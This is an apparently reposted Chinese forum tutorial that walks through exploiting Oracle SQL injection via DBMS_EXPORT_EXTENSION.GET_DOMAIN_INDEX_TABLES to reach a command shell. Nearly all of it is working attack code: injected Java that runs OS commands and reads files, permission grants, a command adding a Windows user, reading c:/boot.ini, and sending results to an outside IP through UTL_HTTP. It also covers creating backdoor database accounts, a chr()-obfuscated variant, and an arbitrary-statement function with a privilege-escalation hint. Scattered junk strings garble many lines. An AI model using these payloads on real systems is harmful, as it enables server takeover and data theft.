
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在web上的sql plus执行的,在web注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

" \( d0 z) g! G3 ~  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) # W* J$ L& f* d( P7 j! N. w0 Z
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
  F* U; l" y. Z: E/ ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' z( P1 E: i5 G
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(: j8 n8 e1 g, x* W
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}9 }2 H2 e7 E; j9 f, b  L: v; F
}'''';END;'';END;--','SYS',0,'1',0) from dual
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
& [7 w! \2 ]& ^# n4 C/xxx.jsp?id=1 and '1'<>'a'||( $ P. x  X3 T! U% m2 L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 f) G3 H$ W5 E# l
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(  c, v( r2 r8 W; |, N( t, W
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
, K# d3 z) N8 e7 r}'''';END;'';END;--','SYS',0,'1',0) from dual 7 R1 B5 g% w1 m: j2 r
)
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; x; V0 n+ O% _. e
3.创建函数
- {+ K1 E8 @' J) G& M1 Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# o; a1 F) M4 B0 h
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
* h7 W  g. e6 _+ D# N: [& dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 \4 c1 a5 V3 _9 B2 {create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual5 |* X: J1 t! X7 q$ [& k) ^# U
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual1 y& E" d$ s5 }4 u. l9 J  f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual& V" P) k$ T! |/ m
5.测试上面的几步是否成功
and '1'<>'11'||( 1 p4 D  h9 t& @6 v- x
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 4 X) ^, p. b  T
)
* P0 w' x( X& d' y9 xand '1'<>( ( q. |8 ~0 o8 p0 {5 E, u
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
3 Q- b+ }% g* ~1 a9 y. k* K: c)
6.执行命令:
% R$ n: _6 O2 A: W/xxx.jsp?id=1 and '1'<>( * y* R# T( T: H; d2 o; Q
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual ) V5 J) ^" T4 [
4 S5 f, [1 F! a! L$ J$ b7 V: Q
)
$ z) E: @- a/ l  q8 B' h$ S/xxx.jsp?id=1 and '1'<>( * w+ K0 x- g2 i$ d0 g
select  sys.LinxReadFile('c:/boot.ini') from dual
& U8 \* Z/ R: Y2 i6 ^  `- }2 M
% x5 I0 [/ s  T- o  z* h5 J. b7 x$ ~9 C)/ @" @4 W( Q6 ~. e$ w4 }+ ^
  
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
9 E- v0 a$ T2 X/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用UTL_HTTP.request():
! O9 ~6 n; C, ^# @% {/xxx.jsp?id=1 and '1'<>(   ]* L' `1 _8 s4 I
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual' H4 U8 w+ Q0 J5 `7 ^; X5 e; z
)
' p7 \  o$ g6 b: `: D1 B1 S8 S/xxx.jsp?id=1 and '1'<>(
3 Y( v6 w/ B6 M. W, Y) X! x- X: ?SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
% L) ], ?( i/ m)   f7 P/ `% l: \9 N/ L
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
1 x% Q+ H$ a, T# Mselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'" \! B# s+ T. v+ ?, Q! f. I3 m
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# X$ B4 d; `4 v3 F, t
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" {6 h8 j- S! |CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual# G( p/ _1 c0 R; k) n
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),& n  R' ]4 y3 {9 m+ V
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
  t! {7 ?% z9 E4 c4 U1<>( / Z# [# ^+ m! a0 _% F) g! ^
select user_id from all_users where username='LINXSQL'
0 r: |8 T. l- _$ C/ ?' q) * _# e( y3 Z+ E4 I: ?
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( m, ?5 e. }* c4 cGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
3 F1 s3 M; N+ d* n$ d% T2 ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 Q  }4 a9 P5 `! ~( z
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
1.jsp?id=1 and '1'<>(
. G2 m; S6 _9 Nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; G4 b; ]" Y, q
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
7 \/ ]3 q, H- ~) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
* P- j- O$ i) U! H8 S! V. c' M )+ f8 P/ J* Y6 ^* o
5 V8 q- u4 s# _4 w5 h( W4 H
; ~: ?+ w9 R8 ^) a1 K( `

' z9 j* \3 x$ i& n3 b